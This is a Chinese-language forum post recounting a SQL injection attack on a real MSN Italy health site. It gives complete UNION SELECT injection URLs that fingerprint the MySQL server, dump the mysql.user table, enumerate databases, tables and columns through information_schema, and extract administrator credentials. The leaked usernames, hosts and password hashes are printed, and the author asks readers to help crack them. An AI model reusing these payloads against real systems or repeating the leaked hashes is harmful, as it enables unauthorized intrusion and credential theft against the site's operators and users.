Gh0u1发了一个链接说 粗看是msn的网站,还以为有什么新的技术文章共享呢,一进去就不对啊~ 就看到1,2,3,4,5 这样的点数~看在url ,居然是一个注入点~ 被吓了下~,后来才是知道,他是在逛国外一个论坛的时候,一个网站上发出来的~ 好奇心来了,就看看,我记不记得这么玩这个~(最近失忆的很厉害), 首先 看到给的地址 http://benessere.it.msn.com/gallery/-1 union select 1,2,3,4,5,6,7,8,9,10,11--/casalinghe-perfette-10-m osse-.html 网页出现了1,2,9,10,11 好~~可以开始使用语句来 首先 看看他的数据库是什么类型的~ 我首先尝试mysql的 我将2 处替换成了 concat_ws(0x3a,user(),@@version,database()) 接着完整的语句是 http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,user(),@@version,database()),3,4,5,6,7,8,9,10,11--/casalinghe-perfette-10-m osse-.html 我们就知道他的数据库版本 使用的用户 数据库的名字 mysql@localhost:5.0.22:progr 居然出现了~是mysql的哦 还是5.0.22的~ 接着 跨库看看~ 语句是 http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,User,Password,Host),3,4,5,6,7,8,9,10,11+from+mysql.user--/casalinghe-perfette-10-m osse-.html 接着看到可人的消息 root:7687543e5d021f1c:localhost 会不会有其他的用户呢? 接着我就用limit 来试下 http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,User,Password,Host),3,4,5,6,7,8,9,10,11+from+mysql.user+limit,1,30--/casalinghe-perfette-10-m osse-.html 呃~居然有唉 root:7687543e5d021f1c:donna.sanihelp.it 依次测试的掉完全的用户如下 root:7687543e5d021f1c:localhost root:7687543e5d021f1c:donna.sanihelp.it donnamsn:1558b7da73ad0249:% mysql:659764293f6714cc:localhost concorsi:7b1df5aa33eb7d2c:localhost 可惜没有一个可以破的`~(微软不是吃素的~安全密码总要个吧 ~) 无果~ 然后用同样的方法 查阅了 information_schema.schema 知道了他有哪些库 http://benessere.it.msn.com/gallery/-1 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11+from+information_schema.SCHEMATA+limit+22,30--/casalinghe-perfette-10-m osse-.html 12allnew SLAVEFILE Test alimenti concorsi contatti contenuti dieta_on_line drAnswer farmaci gallery lavoro mailinglist mysql newsletter_msn nomi progr quiz sondaggi strutture terme viaggi ........(不想读了~仅供学习而已) 知道库里读表名 information_schema.Tables http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,TABLES_NAME,TABLE_SCHEMA),3,4,5,6,7,8,9,10,11+from+information_schema.Tables+limit+1,30--/casalinghe-perfette-10-m osse-.html 我用where 居然出问题~ (请大牛给予修正~我用笨办法) 接着我们知道了表的名字 做记录~~然后找写关键的 接着是COLUMNS 是这个表~知道表的字段名 方法问题如上所述~自己变通下 ~ http://benessere.it.msn.com/gallery/-1 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10,11+from+information_schema.COLUMNS+where+TABLE_NAME=char(49,50,97,108,108,95,97,100,109,105,110,95,98,95,108,111,103)+limit+1,30--/casalinghe-perfette-10-m osse-.html we know id user pass then~ http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,user,pass),3,4,5,6,7,8,9,10,11+from+12allnew.12all_admin_b_log+limit+8,30--/casalinghe-perfette-10-m osse-.html ok!~ we know the username and password but i don't know how to crack it ~ who can help me ~to crack it~ that's all thank all of you |
|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )
GMT+8, 2024-10-1 05:37 , Processed in 0.143216 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.